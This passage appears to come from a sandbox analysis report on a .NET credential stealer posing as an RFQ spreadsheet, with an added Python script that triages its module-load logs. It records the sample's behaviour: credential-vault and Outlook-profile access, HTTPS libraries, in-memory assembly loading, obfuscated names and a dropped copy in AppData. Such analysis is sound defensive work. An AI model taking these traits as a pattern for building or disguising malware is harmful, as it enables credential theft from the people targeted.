Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: vaultcli.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: edputil.dll
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
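                      The module-load list above is raw sandbox output, but it is where the overview's credential-theft and C2 verdicts become concrete: both the submitted sample and its dropped copy C:\Users\user\AppData\Roaming\ywKDUBCUA.exe pull in vaultcli.dll (the Windows Credential Manager client), winhttp.dll and schannel.dll (outbound HTTPS), and the Outlook profile key is opened right after, whereas the same DLLs loaded by powershell.exe or WmiPrvSE.exe out of C:\Windows are routine. The script below is an added example and not part of the Joe Sandbox report: it parses "Section loaded" lines in the form printed above (tolerating the fused "exeSection loaded" rendering and the trailing "Jump to behavior" link text of the raw page), keeps only processes running from user-writable paths, and annotates the loads worth a second look. The INTERESTING table and the USER_WRITABLE path markers are this example's own choices, the sample lines are a subset copied from the report, and in production the same logic would consume Sysmon Event ID 7 (ImageLoad) records instead.

```python
import re
from collections import defaultdict

# Event lines copied from the report above. Two are left in the raw page's fused form
# with the "Jump to behavior" link text so the parser is exercised on both renderings.
REPORT_LINES = r"""
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: vaultcli.dllJump to behavior
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe Section loaded: schannel.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
""".strip().splitlines()

# One report line: "Source: <image path>[ ]Section loaded: <dll>[Jump to behavior]".
LINE_RE = re.compile(
    r"^Source:\s*(.+?)\s*Section loaded:\s*(\S+?\.dll)(?:\s*Jump to behavior)?\s*$",
    re.IGNORECASE,
)

# Path fragments that an unprivileged user can write to (assumption for this example;
# extend with your own staging directories).
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")

# DLLs whose load from an image in a user-writable path deserves a look. The wording is
# the documented role of each DLL; the selection is this example's own.
INTERESTING = {
    "vaultcli.dll": "Credential Manager (Windows Vault) client: access to stored credentials",
    "dpapi.dll": "DPAPI: decryption of secrets saved under the current user (browsers, mail clients)",
    "schannel.dll": "TLS: outbound HTTPS, consistent with the Telegram API traffic in the overview",
    "winhttp.dll": "WinHTTP client",
    "wininet.dll": "WinINet client",
    "amsi.dll": "AMSI: .NET Framework 4.8+ scans assemblies loaded from memory, so this hints at Assembly.Load(byte[])",
}


def parse(lines):
    """Yield (image_path, dll) for every line that matches the report format; skip the rest."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            yield m.group(1).strip(), m.group(2).lower()


def is_user_writable(path: str) -> bool:
    """True when the image lives under a directory a normal user can write to."""
    p = path.lower()
    return any(tag in p for tag in USER_WRITABLE)


def triage(lines):
    """Map each image running from a user-writable path to its noteworthy DLL loads, in report order."""
    hits = defaultdict(list)
    for image, dll in parse(lines):
        if is_user_writable(image) and dll in INTERESTING:
            hits[image].append((dll, INTERESTING[dll]))
    return dict(hits)


if __name__ == "__main__":
    for image, loads in triage(REPORT_LINES).items():
        print(image)
        for dll, why in loads:
            print(f"    {dll:14s} {why}")
```

A single load of schannel.dll or dpapi.dll proves nothing on its own (any .NET application that talks HTTPS or calls DPAPI loads them); the signal is the combination of an unsigned image under C:\Users, vault plus TLS plus the Outlook profile probe, and the Telegram traffic recorded in the overview. Treat the output as a triage hint to be confirmed against the network and file-access sections, not as a verdict.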

                      Data Obfuscation

                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, WXLXx86ylIQfeMsLR5.cs .Net Code: USmjbMq54i System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.288e26c.1.raw.unpack, wehuuoKhMKMbnQu72K.cs .Net Code: LOPk5OGwQvvejRfJl7n System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, WXLXx86ylIQfeMsLR5.cs .Net Code: USmjbMq54i System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe Code function: 0_2_00E9D5C0 push eax; ret 0_2_00E9D5C1
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe Code function: 0_2_06BF9850 pushfd ; iretd 0_2_06BF9879
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe Code function: 9_2_014F9BD0 pushad ; ret 9_2_014F9BD1
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe Code function: 9_2_06811658 push cs; retf 9_2_0681165B
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe Code function: 9_2_0681B3C0 push es; ret 9_2_0681B3D0
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe Code function: 9_2_071C4790 pushfd ; retf 9_2_071C4791
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe Code function: 9_2_071C2A10 push es; ret 9_2_071C2A20
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe Code function: 10_2_016DD5C0 push eax; ret 10_2_016DD5C1
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe Code function: 10_2_07309850 pushfd ; iretd 10_2_07309879
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe Code function: 16_2_00F29BD0 pushad ; ret 16_2_00F29BD1
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe Code function: 16_2_05EA1578 push cs; retf 16_2_05EA157C
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe Code function: 16_2_05EA1499 pushad ; retf 16_2_05EA149A
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe Code function: 16_2_05EA1658 push cs; retf 16_2_05EA165B
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe Code function: 16_2_05EAB3C0 push es; ret 16_2_05EAB3D0
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe Code function: 16_2_06854790 pushfd ; retf 16_2_06854791
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe Code function: 16_2_06852A10 push es; ret 16_2_06852A20
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exe Static PE information: section name: .text entropy: 7.804264542022236
                      Source: ywKDUBCUA.exe.0.dr Static PE information: section name: .text entropy: 7.804264542022236
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, BXf6FBO8RUpjNfUvb9.cs High entropy of concatenated method names: 'mhUvMcwqon', 'IAOviKPKa5', 'jVCvKk9uNr', 'oFFKIv2Q9E', 'dXpKz8YSZ4', 'Jn5vCtCapQ', 'HnPvGYHQkj', 'ntSvS3v78y', 'Cq5vnr57wd', 'vh1vjBwX4A'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, t0Q8xKg2Rt1VrenmFW.cs High entropy of concatenated method names: 'H3VKfcptMI', 'ApxKDPuCVh', 'EVXKxXidVL', 'B17KvgMWAR', 'qajK6j4F0j', 'tG1xtnY5cL', 'G7GxwkLdQ7', 'b7gx9q8Hhc', 'LI2xJ2pehw', 'LxAxrJ6I2l'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, z4Lt9BGCCfMS3EUAYkN.cs High entropy of concatenated method names: 'qE8Y8tgVAq', 'uWqY5QBjba', 'aZLYb8He3d', 'jWiY1hu1P4', 'CTjYkhxgjj', 'f8XYyke7OR', 'PrKYsOWfGw', 'dMJYqaOQRj', 'XV3YPGBv3x', 'hMUYUEnKXF'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, lMgrnFqi5rRuM663RZ.cs High entropy of concatenated method names: 'pJ6Da2IbYg', 'lhfDFycPY9', 'POqDVajNoF', 'SwfDuqA7o3', 'AMHDtuun4L', 'HTLDwE1eKA', 'oJfD9IEfqC', 'lodDJMpIVO', 'wSiDr85Lhv', 'xpSDIV9aPF'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, qrKNNWIs1iYM2TK7gp.cs High entropy of concatenated method names: 'gWoYGhdVAx', 'nCHYn3uVIJ', 'Rn7Yj1uD02', 'TAeYMdTIya', 'kv9YDgKdyO', 'W7mYxm78GO', 'm3lYKARpgE', 'q5q09vm0n9', 'rTq0JqQKOj', 'aU80rUDyVJ'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, uwv9tXGnDnUKhCEBhfI.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VY9RaHt1RX', 'tZeRFu2b5W', 'in6RVpfY3K', 'l2XRuY1cMa', 'omDRt5qpFk', 'FmYRwbvEw2', 'Tr1R9N3amn'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, WXLXx86ylIQfeMsLR5.cs High entropy of concatenated method names: 'sKynf5yHPQ', 'Lg5nMC3SVq', 'dWLnDSdHNB', 'Rq8niDlRBu', 'k1XnxLShZM', 'oQqnKaXL1s', 'HQZnvK96Om', 'YDFn6w8YFe', 'NUZndorCoA', 'Iblnl6gjux'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, FxkmO9PvtoTWIXJWG1.cs High entropy of concatenated method names: 'pfCi1prOjy', 'UYYiy3QDPB', 'VpSiqgDFR5', 'plUiPDBEDc', 'TfTiXUAcEl', 'qXkioceSUY', 'JOWimYSXIM', 'eKTi0PUjvy', 'CwpiYXfkFl', 'C0ViRmCs7f'
